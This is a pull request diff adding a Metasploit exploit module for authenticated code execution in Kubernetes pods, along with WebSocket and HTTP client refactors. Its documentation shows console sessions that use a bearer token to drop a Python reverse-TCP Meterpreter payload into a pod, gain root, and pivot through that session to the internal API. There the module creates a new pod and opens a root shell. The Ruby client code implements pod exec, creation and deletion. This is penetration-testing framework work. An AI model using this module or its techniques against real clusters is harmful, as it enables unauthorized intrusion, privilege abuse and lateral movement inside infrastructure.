### PR TITLE
Add Module For Kubernetes Pod Authenticated Code Execution

### DIFF
--- a/documentation/modules/exploit/multi/kubernetes/exec.md
+++ b/documentation/modules/exploit/multi/kubernetes/exec.md
@@ -104,6 +104,7 @@ msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
 [*] Using image: busybox
 [+] Pod created: burhgvzc
 [*] Waiting for the pod to be ready...
+[+] Successfully established the WebSocket
 [*] Found shell.
 [*] Command shell session 2 opened (172.17.0.31:59437 -> 10.96.0.1:443) at 2021-10-01 10:05:57 -0400
 

--- a/documentation/modules/exploit/multi/kubernetes/exec.md
+++ b/documentation/modules/exploit/multi/kubernetes/exec.md
@@ -1,0 +1,114 @@
+## Vulnerable Application
+
+### Description
+
+Execute a payload within a Kubernetes pod.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/kubernetes/exec`
+3. Set the required options
+4. Do: `run`
+5. You should get a shell.
+
+## Options
+
+### SESSION
+An optional session to use for configuration. When specified, the values of `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT`
+will be gathered from the session host. This requires that the session be on an existing Kubernetes pod. The necessary
+values may not always be present.
+
+Setting this option will also automatically route connections through the specified session.
+
+### TOKEN
+The JWT token. The token with the necessary privileges to access the exec endpoint within a running pod and optionally
+create a new pod.
+
+### POD
+The pod name to execute in. When not specified, a new pod will be created with an entrypoint that allows it to run
+forever. After creation, the pod will be used to execute the payload. **The created pod is not automatically cleaned
+up.** A note containing the created pod's information will be added to the database when it is connected.
+
+### NAMESPACE
+The Kubernetes namespace that the `TOKEN` has permissions for and that `POD` either exists in or should be created in.
+
+### SHELL
+The shell to use for execution. `bash` is likely preferred from a usability perspective, but is not present as often as
+`sh` is.
+
+### TARGET
+#### Interactive WebSocket
+Communicate directly with the pod using the Kubernetes WebSocket API. This is the most similar option to the `kubectl
+exec --stdin --tty` command. No Metasploit payload is transferred to the target.
+
+### Unix Command
+Run the specified command payload and read the output. Custom commands can be run with the `cmd/unix/generic` payload.
+
+### Linux Dropper
+Use a command stager to transfer a Metasploit payload to the target and execute it. This will result in the payload
+being written to disk and will require potentially non-standard binaries to be present on the remote system, depending
+on the selected `CMDSTAGER::FLAVOR` option.
+
+### Python
+Run a Python payload on the remote host. This technique will automatically find and use either a `python`, `python3`, or
+`python2` binary on the remote system to use for execution.
+
+## Scenarios
+
+### Kubernetes v1.22.1
+In this scenario, Metasploit has direct access to the Kubernetes API. A known token is used to execute a Python payload
+within the `thinkphp-67f7c88cc9-tgpfh` pod.
+
+```
+msf6 > use exploit/multi/kubernetes/exec 
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
+TOKEN => eyJhbGciOiJSUzI1...
+msf6 exploit(multi/kubernetes/exec) > set POD thinkphp-67f7c88cc9-tgpfh
+POD => thinkphp-67f7c88cc9-tgpfh
+msf6 exploit(multi/kubernetes/exec) > set RHOSTS 192.168.159.31
+RHOSTS => 192.168.159.31
+msf6 exploit(multi/kubernetes/exec) > set TARGET Python 
+TARGET => Python
+msf6 exploit(multi/kubernetes/exec) > set PAYLOAD python/meterpreter/reverse_tcp
+PAYLOAD => python/meterpreter/reverse_tcp
+msf6 exploit(multi/kubernetes/exec) > run
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Sending stage (39736 bytes) to 192.168.159.31
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.31:59234) at 2021-10-01 09:55:00 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : thinkphp-67f7c88cc9-tgpfh
+OS           : Linux 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > background 
+[*] Backgrounding session 1...
+msf6 exploit(multi/kubernetes/exec) >
+```
+
+Next, the compromised session is used to access the internal Kubernetes endpoint, create a new pod and open a shell
+directly via a WebSocket.
+
+```
+msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
+TARGET => Interactive WebSocket
+msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
+
+[*] Routing traffic through session: 1
+[+] Kubernetes service host: 10.96.0.1:443
+[*] Using image: busybox
+[+] Pod created: burhgvzc
+[*] Waiting for the pod to be ready...
+[*] Found shell.
+[*] Command shell session 2 opened (172.17.0.31:59437 -> 10.96.0.1:443) at 2021-10-01 10:05:57 -0400
+
+id
+uid=0(root) gid=0(root) groups=10(wheel)
+pwd
+/
+```

--- a/documentation/modules/exploit/multi/kubernetes/exec.md
+++ b/documentation/modules/exploit/multi/kubernetes/exec.md
@@ -37,6 +37,13 @@ The Kubernetes namespace that the `TOKEN` has permissions for and that `POD` eit
 The shell to use for execution. `bash` is likely preferred from a usability perspective, but is not present as often as
 `sh` is.
 
+### PodName
+*This is an advanced option.*
+
+The image from which to create the pod. When a new pod is created (`POD` is blank), this option can be used to specify
+the image that is used. If this option is blank, each image will be tried from the list of running pods until one
+successfully starts.
+
 ### TARGET
 #### Interactive WebSocket
 Communicate directly with the pod using the Kubernetes WebSocket API. This is the most similar option to the `kubectl

--- a/lib/msf/base/sessions/ssh_command_shell_bind.rb
+++ b/lib/msf/base/sessions/ssh_command_shell_bind.rb
@@ -28,7 +28,7 @@ module Msf::Sessions
     # channel object.
     #
     class TcpClientChannel
-      include Rex::IO::StreamAbstraction
+      include Rex::Post::Channel::StreamAbstraction
 
       #
       # This is a common interface that socket paris are extended with to be
@@ -114,27 +114,6 @@ module Msf::Sessions
         end
 
         @ssh_channel.eof!
-      end
-
-      #
-      # Read *length* bytes from the channel. If the operation times out, the data
-      # that was read will be returned or nil if no data was read.
-      #
-      def read(length = nil)
-        if closed?
-          raise IOError, 'Channel has been closed.', caller
-        end
-
-        buf = ''
-        length = 65536 if length.nil?
-
-        begin
-          buf << lsock.recv(length - buf.length) while buf.length < length
-        rescue StandardError
-          buf = nil if buf.empty?
-        end
-
-        buf
       end
 
       #

--- a/lib/msf/core/exploit/remote/http/kubernetes.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes.rb
@@ -1,0 +1,257 @@
+# -*- coding: binary -*-
+
+require 'rex/proto/http/web_socket'
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        module Kubernetes
+          module Error
+            class ApiError < ::StandardError
+            end
+
+            class AuthenticationError < ApiError
+            end
+
+            class UnexpectedStatusCode < ApiError
+              attr_reader :status_code
+
+              def initialize(status_code)
+                super
+                @status_code = status_code
+              end
+            end
+          end
+
+          class Client
+            USER_AGENT = 'kubectl/v1.22.2 (linux/amd64) kubernetes/8b5a191'.freeze
+
+            class ExecChannel < Rex::Proto::Http::WebSocket::Interface::Channel
+              attr_reader :error
+
+              def initialize(websocket)
+                @error = {}
+
+                super(websocket, write_type: :text)
+              end
+
+              def on_data_read(data, _data_type)
+                return data if data.blank?
+
+                exec_channel = data[0].ord
+                data = data[1..-1]
+                case exec_channel
+                when EXEC_CHANNEL_STDOUT
+                  return data
+                when EXEC_CHANNEL_STDERR
+                  return data
+                when EXEC_CHANNEL_ERROR
+                  @error = JSON(data)
+                end
+
+                nil
+              end
+
+              def on_data_write(data)
+                EXEC_CHANNEL_STDIN.chr + data
+              end
+            end
+
+            def initialize(config)
+              @http_client = config.fetch(:http_client)
+              @token = config[:token]
+            end
+
+            # rubocop:disable Style/DoubleNegation
+            def exec_pod(name, namespace, command, options = {})
+              options = {
+                'stdin' => false,
+                'stdout' => true,
+                'stderr' => true,
+                'tty' => false
+              }.merge(options)
+
+              # while kubectl uses SPDY/3.1, the Python client uses WebSockets over HTTP/1.1
+              # see: https://github.com/kubernetes/kubernetes/issues/7452
+              websocket = http_client.connect_ws(
+                request_options(
+                  {
+                    'method' => 'GET',
+                    'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{name}/exec"),
+                    'query' => build_query_string({
+                      'command' => command,
+                      'stdin' => !!options.delete('stdin'),
+                      'stdout' => !!options.delete('stdout'),
+                      'stderr' => !!options.delete('stderr'),
+                      'tty' => !!options.delete('tty')
+                    }),
+                    'headers' => {
+                      'Sec-Websocket-Protocol' => 'v4.channel.k8s.io'
+                    }
+                  },
+                  options
+                )
+              )
+
+              websocket
+            end
+            # rubocop:enable Style/DoubleNegation
+
+            def exec_pod_capture(name, namespace, command, options = {}, &block)
+              websocket = exec_pod(name, namespace, command, options)
+              return nil if websocket.nil?
+
+              result = { error: {}, stdout: '', stderr: '' }
+              websocket.wsloop do |channel_data, _data_type|
+                next if channel_data.blank?
+
+                channel = channel_data[0].ord
+                channel_data = channel_data[1..-1]
+                case channel
+                when EXEC_CHANNEL_STDOUT
+                  result[:stdout] << channel_data
+                  block.call(channel_data, nil) if block_given?
+                when EXEC_CHANNEL_STDERR
+                  result[:stderr] << channel_data
+                  block.call(nil, channel_data) if block_given?
+                when EXEC_CHANNEL_ERROR
+                  result[:error] = JSON(channel_data)
+                end
+              end
+
+              result
+            end
+
+            def get_pod(pod, namespace, options = {})
+              _res, json = call_api(
+                {
+                  'method' => 'GET',
+                  'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{pod}")
+                },
+                options
+              )
+
+              json
+            end
+
+            def list_namespace(options = {})
+              _res, json = call_api(
+                {
+                  'method' => 'GET',
+                  'uri' => http_client.normalize_uri('/api/v1/namespaces')
+                },
+                options
+              )
+
+              json
+            end
+
+            def list_pods(namespace, options = {})
+              _res, json = call_api(
+                {
+                  'method' => 'GET',
+                  'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods")
+                },
+                options
+              )
+
+              json
+            end
+
+            def create_pod(data, namespace, options = {})
+              res, json = call_api(
+                {
+                  'method' => 'POST',
+                  'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods"),
+                  'data' => JSON.pretty_generate(data)
+                },
+                options
+              )
+
+              if res.code != 201
+                raise Kubernetes::Error::UnexpectedStatusCode, res.code
+              end
+
+              json
+            end
+
+            def delete_pod(name, namespace, options = {})
+              _res, json = call_api(
+                {
+                  'method' => 'DELETE',
+                  'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{name}"),
+                  'headers' => {}
+                },
+                options
+              )
+
+              json
+            end
+
+            private
+
+            EXEC_CHANNEL_STDIN = 0
+            EXEC_CHANNEL_STDOUT = 1
+            EXEC_CHANNEL_STDERR = 2
+            EXEC_CHANNEL_ERROR = 3
+            EXEC_CHANNEL_RESIZE = 4
+
+            attr_reader :http_client
+
+            def build_query_string(query_vars)
+              qary = []
+              query_vars.each_pair do |key, val|
+                key = key.to_s
+
+                key = Rex::Text.uri_encode(key)
+                if val.is_a? Array
+                  qary += val.map { |subval| "#{key}=#{Rex::Text.uri_encode(subval.to_s)}" }
+                else
+                  qary << "#{key}=#{Rex::Text.uri_encode(val.to_s)}"
+                end
+              end
+
+              qary.join('&')
+            end
+
+            # TODO: Support receiving data directly as a table?
+            # Accept: application/json;as=Table;g=meta.k8s.io;v=v1beta1
+            # https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables
+            def call_api(request, options = {})
+              res = http_client.send_request_raw(request_options(request, options))
+
+              if res.nil? || res.body.empty?
+                raise Kubernetes::Error::ApiError
+              elsif res.code == 401
+                raise Kubernetes::Error::AuthenticationError
+              end
+
+              json = res.get_json_document
+              if json.nil?
+                raise Kubernetes::Error::ApiError
+              end
+
+              [res, json.deep_symbolize_keys]
+            end
+
+            def request_options(request, options = {})
+              token = options.fetch(:token, @token)
+
+              request.merge(
+                {
+                  'agent' => USER_AGENT,
+                  'headers' => request.fetch('headers', {}).merge(
+                    {
+                      'Authorization' => "Bearer #{token}"
+                    }
+                  )
+                }
+              )
+            end
+          end
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/remote/http/kubernetes/client.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/client.rb
@@ -1,29 +1,13 @@
 # -*- coding: binary -*-
 
 require 'rex/proto/http/web_socket'
+require 'uri'
 
 module Msf
   class Exploit
     class Remote
       module HTTP
         module Kubernetes
-          module Error
-            class ApiError < ::StandardError
-            end
-
-            class AuthenticationError < ApiError
-            end
-
-            class UnexpectedStatusCode < ApiError
-              attr_reader :status_code
-
-              def initialize(status_code)
-                super
-                @status_code = status_code
-              end
-            end
-          end
-
           class Client
             USER_AGENT = 'kubectl/v1.22.2 (linux/amd64) kubernetes/8b5a191'.freeze
 
@@ -67,8 +51,8 @@ module Msf
             def exec_pod(name, namespace, command, options = {})
               options = {
                 'stdin' => false,
-                'stdout' => true,
-                'stderr' => true,
+                'stdout' => false,
+                'stderr' => false,
                 'tty' => false
               }.merge(options)
 
@@ -79,7 +63,7 @@ module Msf
                   {
                     'method' => 'GET',
                     'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{name}/exec"),
-                    'query' => build_query_string({
+                    'query' => URI.encode_www_form({
                       'command' => command,
                       'stdin' => !!options.delete('stdin'),
                       'stdout' => !!options.delete('stdout'),
@@ -198,22 +182,6 @@ module Msf
             EXEC_CHANNEL_RESIZE = 4
 
             attr_reader :http_client
-
-            def build_query_string(query_vars)
-              qary = []
-              query_vars.each_pair do |key, val|
-                key = key.to_s
-
-                key = Rex::Text.uri_encode(key)
-                if val.is_a? Array
-                  qary += val.map { |subval| "#{key}=#{Rex::Text.uri_encode(subval.to_s)}" }
-                else
-                  qary << "#{key}=#{Rex::Text.uri_encode(val.to_s)}"
-                end
-              end
-
-              qary.join('&')
-            end
 
             # TODO: Support receiving data directly as a table?
             # Accept: application/json;as=Table;g=meta.k8s.io;v=v1beta1

--- a/lib/msf/core/exploit/remote/http/kubernetes/error.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/error.rb
@@ -1,0 +1,28 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        module Kubernetes
+          module Error
+            class ApiError < ::StandardError
+            end
+
+            class AuthenticationError < ApiError
+            end
+
+            class UnexpectedStatusCode < ApiError
+              attr_reader :status_code
+
+              def initialize(status_code)
+                super
+                @status_code = status_code
+              end
+            end
+          end
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/remote/http_client.rb
+++ b/lib/msf/core/exploit/remote/http_client.rb
@@ -217,6 +217,10 @@ module Exploit::Remote::HttpClient
     return nclient
   end
 
+  #
+  # Establish a WebSocket connection to the remote server.
+  #
+  # @return [Rex::Proto::Http::WebSocket::Interface]
   def connect_ws(opts={}, timeout = 20)
     ws_key = Rex::Text.rand_text_alphanumeric(20)
     opts['headers'] = opts.fetch('headers', {}).merge({

--- a/lib/msf/core/exploit/remote/http_client.rb
+++ b/lib/msf/core/exploit/remote/http_client.rb
@@ -134,7 +134,6 @@ module Exploit::Remote::HttpClient
     end
   end
 
-
   #
   # Connects to an HTTP server.
   #
@@ -220,6 +219,7 @@ module Exploit::Remote::HttpClient
   #
   # Establish a WebSocket connection to the remote server.
   #
+  # @raise [Rex::Proto::Http::WebSocket::WebSocketError] raises an exception if the connection fails
   # @return [Rex::Proto::Http::WebSocket::Interface]
   def connect_ws(opts={}, timeout = 20)
     ws_key = Rex::Text.rand_text_alphanumeric(20)
@@ -230,21 +230,25 @@ module Exploit::Remote::HttpClient
       'Sec-WebSocket-Key' => ws_key
     })
 
+    if (http_client = opts['client']).nil?
+      opts['client'] = http_client = connect(opts)
+      raise Rex::Proto::Http::WebSocket::ConnectionError.new if http_client.nil?
+    end
+
     res = send_request_raw(opts, timeout, false)
     unless res&.code == 101
       disconnect
-      return nil
+      raise Rex::Proto::Http::WebSocket::ConnectionError.new(http_response: res)
     end
 
     # see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-WebSocket-Accept
     accept_ws_key = Rex::Text.encode_base64(OpenSSL::Digest::SHA1.digest(ws_key + '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'))
     unless res.headers['Sec-WebSocket-Accept'] == accept_ws_key
       disconnect
-      return nil
+      raise Rex::Proto::Http::WebSocket::ConnectionError.new(msg: 'Invalid Sec-WebSocket-Accept header', http_response: res)
     end
 
-    socket = self.client.conn
-    self.client = nil
+    socket = http_client.conn
     socket.extend(Rex::Proto::Http::WebSocket::Interface)
   end
 
@@ -351,7 +355,7 @@ module Exploit::Remote::HttpClient
       actual_timeout = opts[:timeout] || timeout
     end
 
-    c = connect(opts)
+    c = opts['client'] || connect(opts)
     r = opts[:cgi] ? c.request_cgi(opts) : c.request_raw(opts)
 
     if datastore['HttpTrace']

--- a/lib/msf/core/exploit/remote/http_client.rb
+++ b/lib/msf/core/exploit/remote/http_client.rb
@@ -159,7 +159,8 @@ module Exploit::Remote::HttpClient
       ssl_version,
       proxies,
       client_username,
-      client_password
+      client_password,
+      comm: opts['comm']
     )
 
     # Configure the HTTP client with the supplied parameter

--- a/lib/msf/core/exploit/remote/http_client.rb
+++ b/lib/msf/core/exploit/remote/http_client.rb
@@ -217,6 +217,33 @@ module Exploit::Remote::HttpClient
     return nclient
   end
 
+  def connect_ws(opts={}, timeout = 20)
+    ws_key = Rex::Text.rand_text_alphanumeric(20)
+    opts['headers'] = opts.fetch('headers', {}).merge({
+      'Connection' => 'Upgrade',
+      'Upgrade' => 'WebSocket',
+      'Sec-WebSocket-Version' => 13,
+      'Sec-WebSocket-Key' => ws_key
+    })
+
+    res = send_request_raw(opts, timeout, false)
+    unless res&.code == 101
+      disconnect
+      return nil
+    end
+
+    # see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-WebSocket-Accept
+    accept_ws_key = Rex::Text.encode_base64(OpenSSL::Digest::SHA1.digest(ws_key + '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'))
+    unless res.headers['Sec-WebSocket-Accept'] == accept_ws_key
+      disconnect
+      return nil
+    end
+
+    socket = self.client.conn
+    self.client = nil
+    socket.extend(Rex::Proto::Http::WebSocket::Interface)
+  end
+
   #
   # Converts datastore options into configuration parameters for the
   # Metasploit::LoginScanner::Http class. Any parameters passed into

--- a/lib/msf/core/option_container.rb
+++ b/lib/msf/core/option_container.rb
@@ -208,7 +208,7 @@ module Msf
       end
 
       # Validate all permutations of rhost combinations
-      if include?('RHOSTS') && !(datastore['RHOSTS'].blank? && !get('RHOSTS').required)
+      if include?('RHOSTS') && !(datastore['RHOSTS'].blank? && !self['RHOSTS'].required)
         error_options = Set.new
         error_reasons = Hash.new do |hash, key|
           hash[key] = []

--- a/lib/msf/core/option_container.rb
+++ b/lib/msf/core/option_container.rb
@@ -208,7 +208,7 @@ module Msf
       end
 
       # Validate all permutations of rhost combinations
-      if include?('RHOSTS')
+      if include?('RHOSTS') && !(datastore['RHOSTS'].blank? && !get('RHOSTS').required)
         error_options = Set.new
         error_reasons = Hash.new do |hash, key|
           hash[key] = []

--- a/lib/msf/core/post_mixin.rb
+++ b/lib/msf/core/post_mixin.rb
@@ -40,27 +40,28 @@ module Msf::PostMixin
   def setup
     alert_user
 
-    unless session
-      # Always fail if the session doesn't exist.
+    unless session || (datastore['SESSION'].blank? && !options['SESSION']&.required)
       raise Msf::OptionValidateError.new(['SESSION'])
     end
 
-    # Check session readiness before compatibility so the session can be queried
-    # for its platform, capabilities, etc.
-    check_for_session_readiness if session.type == "meterpreter"
+    if session
+      # Check session readiness before compatibility so the session can be queried
+      # for its platform, capabilities, etc.
+      check_for_session_readiness if session.type == "meterpreter"
 
-    incompatibility_reasons = session_incompatibility_reasons(session)
-    if incompatibility_reasons.any?
-      print_warning("SESSION may not be compatible with this module:")
-      incompatibility_reasons.each do |reason|
-        print_warning(" * #{reason}")
+      incompatibility_reasons = session_incompatibility_reasons(session)
+      if incompatibility_reasons.any?
+        print_warning("SESSION may not be compatible with this module:")
+        incompatibility_reasons.each do |reason|
+          print_warning(" * #{reason}")
+        end
       end
     end
 
     # Msf::Exploit#setup for exploits, NoMethodError for post modules
     super rescue NoMethodError
 
-    @session.init_ui(self.user_input, self.user_output)
+    @session.init_ui(self.user_input, self.user_output) if @session
     @sysinfo = nil
   end
 
@@ -214,6 +215,7 @@ module Msf::PostMixin
       issues << "incompatible session platform: #{s.platform}" unless self.platform.supports?(Msf::Module::PlatformList.transform(s.platform))
     end
 
+    # Check all specified meterpreter commands are provided by the remote session
     if s.type == 'meterpreter'
       issues += meterpreter_session_incompatibility_reasons(s)
     end

--- a/lib/msf/core/post_mixin.rb
+++ b/lib/msf/core/post_mixin.rb
@@ -24,7 +24,7 @@ module Msf::PostMixin
     )
 
     register_options( [
-      Msf::OptInt.new('SESSION', [ true, "The session to run this module on." ])
+      Msf::OptInt.new('SESSION', [ true, 'The session to run this module on' ])
     ] , Msf::Post)
 
     # Default stance is active

--- a/lib/rex/post/channel.rb
+++ b/lib/rex/post/channel.rb
@@ -2,3 +2,4 @@
 
 require 'rex/post/channel/container'
 require 'rex/post/channel/socket_abstraction'
+require 'rex/post/channel/stream_abstraction'

--- a/lib/rex/post/channel/stream_abstraction.rb
+++ b/lib/rex/post/channel/stream_abstraction.rb
@@ -1,0 +1,32 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Post
+    module Channel
+      module StreamAbstraction
+        include Rex::IO::StreamAbstraction
+
+        #
+        # Read *length* bytes from the channel. If the operation times out, the data
+        # that was read will be returned or nil if no data was read.
+        #
+        def read(length = nil)
+          if closed?
+            raise IOError, 'Channel has been closed.', caller
+          end
+
+          buf = ''
+          length = 65536 if length.nil?
+
+          begin
+            buf << lsock.recv(length - buf.length) while buf.length < length
+          rescue StandardError
+            buf = nil if buf.empty?
+          end
+
+          buf
+        end
+      end
+    end
+  end
+end

--- a/lib/rex/post/channel/stream_abstraction.rb
+++ b/lib/rex/post/channel/stream_abstraction.rb
@@ -1,5 +1,7 @@
 # -*- coding: binary -*-
 
+require 'rex/io/stream_abstraction'
+
 module Rex
   module Post
     module Channel

--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@@ -23,7 +23,7 @@ class Client
   #
   # Creates a new client instance
   #
-  def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil, username = '', password = '')
+  def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil, username = '', password = '', comm: nil)
     self.hostname = host
     self.port     = port.to_i
     self.context  = context
@@ -32,6 +32,7 @@ class Client
     self.proxies  = proxies
     self.username = username
     self.password = password
+    self.comm = comm
 
     # Take ClientRequest's defaults, but override with our own
     self.config = Http::ClientRequest::DefaultConfig.merge({
@@ -68,8 +69,6 @@ class Client
       'chunked_size'           => 'integer',
       'partial'                => 'bool'
     }
-
-
   end
 
   #
@@ -181,7 +180,8 @@ class Client
       'SSL'        => self.ssl,
       'SSLVersion' => self.ssl_version,
       'Proxies'    => self.proxies,
-      'Timeout'    => timeout
+      'Timeout'    => timeout,
+      'Comm'       => self.comm
     )
   end
 
@@ -230,7 +230,7 @@ class Client
     end
 
     send_request(req, t)
-    
+
     res = read_response(t)
     if req.opts['ntlm_transform_response'] and self.ntlm_client
       req.opts['ntlm_transform_response'].call(self.ntlm_client, res)
@@ -677,6 +677,10 @@ class Client
     nil
   end
 
+  #
+  # An optional comm to use for creating the underlying socket.
+  #
+  attr_accessor :comm
   #
   # The client request configuration
   #

--- a/lib/rex/proto/http/packet.rb
+++ b/lib/rex/proto/http/packet.rb
@@ -324,6 +324,9 @@ protected
           # So if we haven't seen either a Content-Length or a
           # Transfer-Encoding header, there shouldn't be a message body.
           self.body_bytes_left = 0
+        elsif (self.headers['Connection']&.downcase == 'upgrade' && self.headers['Upgrade']&.downcase == 'websocket')
+          # The server appears to be responding to a websocket request
+          self.body_bytes_left = 0
         #else
         # Otherwise we need to keep reading until EOF
         end

--- a/lib/rex/proto/http/web_socket.rb
+++ b/lib/rex/proto/http/web_socket.rb
@@ -6,6 +6,9 @@ module Proto
 module Http
 module WebSocket
 
+class WebSocketError < StandardError
+end
+
 module Interface
   def put_wsframe(frame, opts={})
     put(frame.to_binary_s, opts=opts)
@@ -24,22 +27,67 @@ module Interface
   rescue EOFError
     nil
   end
+
+  # Run a loop to handle data from the remote end of the websocket. The loop will automatically handle fragmentation
+  # (via continuation messages) and ping requests. When the remote connection is closed, the loop will exit. If
+  # specified the block will be passed data chunks and their data types.
+  def wsloop(&block)
+    buffer = ''
+    buffer_type = nil
+
+    while (frame = get_wsframe)
+      frame.unmask! if frame.masked
+
+      case frame.opcode
+      when Opcode::CONNECTION_CLOSE
+        break
+      when Opcode::CONTINUATION
+        # a continuation frame can only be sent for a data frames
+        # see: https://datatracker.ietf.org/doc/html/rfc6455#section-5.4
+        raise WebSocketError, 'Received an unexpected continuation frame (uninitialized buffer)' if buffer_type.nil?
+        buffer << frame.payload_data
+      when Opcode::BINARY
+        raise WebSocketError, 'Received an unexpected binary frame (unfinished buffer)' unless buffer_type.nil?
+        buffer = frame.payload_data
+        buffer_type = :binary
+      when Opcode::TEXT
+        raise WebSocketError, 'Received an unexpected text frame (unfinished buffer)' unless buffer_type.nil?
+        buffer = frame.payload_data
+        buffer_type = :text
+      when Opcode::PING
+        # see: https://datatracker.ietf.org/doc/html/rfc6455#section-5.5.2
+        put_wsframe(frame.dup.tap { |pong| pong.opcode = Opcode::PONG })
+      end
+
+      if frame.fin == 1
+        if block_given?
+          buffer.force_encoding('UTF-8') if buffer_type == :text
+          block.call(buffer, buffer_type)
+        end
+
+        buffer = ''
+        buffer_type = nil
+      end
+    end
+  end
 end
 
 class Opcode < BinData::Bit4
-  ALL = {
-    0x0 => :Continuation,
-    0x1 => :Text,
-    0x2 => :Binary,
-    0x8 => :ConnectionClose,
-    0x9 => :Ping,
-    0xa => :Pong
-  }
-  ALL.each_pair { |val,sym| const_set(sym.to_s.gsub(/([a-z])([A-Z])/, '\1_\2').upcase, val) }
-  default_parameter assert: -> { ALL.keys.include?(value) }
+  CONTINUATION = 0
+  TEXT = 1
+  BINARY = 2
+  CONNECTION_CLOSE = 8
+  PING = 9
+  PONG = 10
+
+  default_parameter assert: -> { !Opcode.name(value).nil? }
+
+  def self.name(value)
+    constants.select { |c| c.upcase == c }.find { |c| const_get(c) == value }
+  end
 
   def to_sym
-    ALL[value]
+    self.class.name(value)
   end
 end
 
@@ -52,25 +100,64 @@ class Frame  < BinData::Record
   bit1   :rsv2
   bit1   :rsv3
   opcode :opcode
-  bit1   :mask
+  bit1   :masked
   bit7   :payload_len_sm
   uint16 :payload_len_md, onlyif: -> { payload_len_sm == 126 }
   uint64 :payload_len_lg, onlyif: -> { payload_len_sm == 127 }
-  uint32 :masking_key, onlyif: -> { mask == 1 }
+  uint32 :masking_key, onlyif: -> { masked == 1 }
   string :payload_data, read_length: -> { payload_len }
 
-  def self.from_binary(value)
-    frame = Frame.new(opcode: Opcode::BINARY)
-    frame.payload_len = value.length
-    frame.payload_data = value
-    frame
+  class << self
+    private
+
+    def from_opcode(opcode, payload, last: true, mask: true)
+      frame = Frame.new(fin: (last ? 1 : 0), opcode: opcode)
+      frame.payload_len = payload.length
+      frame.payload_data = payload
+
+      case mask
+      when TrueClass
+        frame.mask!
+      when Integer
+        frame.mask!(mask)
+      when FalseClass
+      else
+        raise ArgumentError, 'mask must be true, false or an integer (literal mask key)'
+      end
+
+      frame
+    end
   end
 
-  def self.from_text(value)
-    frame = Frame.new(opcode: Opcode::TEXT)
-    frame.payload_len = value.length
-    frame.payload_data = value
-    frame
+  def self.apply_masking_key(data, mask)
+    mask = [mask].pack('N').each_byte.to_a
+    xored = ''
+    data.each_byte.each_with_index do |byte, index|
+      xored << (byte ^ mask[index % 4]).chr
+    end
+
+    xored
+  end
+
+  def self.from_binary(value, last: true, mask: true)
+    from_opcode(Opcode::Binary, value, last: last, mask: mask)
+  end
+
+  def self.from_text(value, last: true, mask: true)
+    from_opcode(Opcode::TEXT, value, last: last, mask: mask)
+  end
+
+  def mask!(key=nil)
+    masked.assign(1)
+    key = rand(0x100000000) if key.nil?
+    masking_key.assign(key)
+    payload_data.assign(self.class.apply_masking_key(payload_data, masking_key))
+  end
+
+  def unmask!
+    payload_data.assign(self.class.apply_masking_key(payload_data, masking_key))
+    masked.assign(0)
+    payload_data
   end
 
   def payload_len
@@ -86,13 +173,13 @@ class Frame  < BinData::Record
 
   def payload_len=(value)
     if value < 126
-      @payload_len_sm = value
+      payload_len_sm.assign(value)
     elsif value < 0xffff
-      @payload_len_sm = 126
-      @payload_len_md = value
+      payload_len_sm.assign(126)
+      payload_len_md.assign(value)
     elsif value < 0x7fffffffffffffff
-      @payload_len_sm = 127
-      @payload_len_lg = value
+      payload_len_sm.assign(127)
+      payload_len_lg.assign(value)
     else
       raise ArgumentError, 'payload length is outside the acceptable range'
     end

--- a/lib/rex/proto/http/web_socket.rb
+++ b/lib/rex/proto/http/web_socket.rb
@@ -334,7 +334,7 @@ class Frame  < BinData::Record
   end
 
   def self.from_binary(value, last: true, mask: true)
-    from_opcode(Opcode::Binary, value, last: last, mask: mask)
+    from_opcode(Opcode::BINARY, value, last: last, mask: mask)
   end
 
   def self.from_text(value, last: true, mask: true)
@@ -348,9 +348,10 @@ class Frame  < BinData::Record
   # @return [String] the masked payload data is returned
   def mask!(key=nil)
     masked.assign(1)
-    key = rand(0x100000000) if key.nil?
+    key = rand(1..0xffffffff) if key.nil?
     masking_key.assign(key)
     payload_data.assign(self.class.apply_masking_key(payload_data, masking_key))
+    payload_data.value
   end
 
   #
@@ -360,7 +361,7 @@ class Frame  < BinData::Record
   def unmask!
     payload_data.assign(self.class.apply_masking_key(payload_data, masking_key))
     masked.assign(0)
-    payload_data
+    payload_data.value
   end
 
   def payload_len

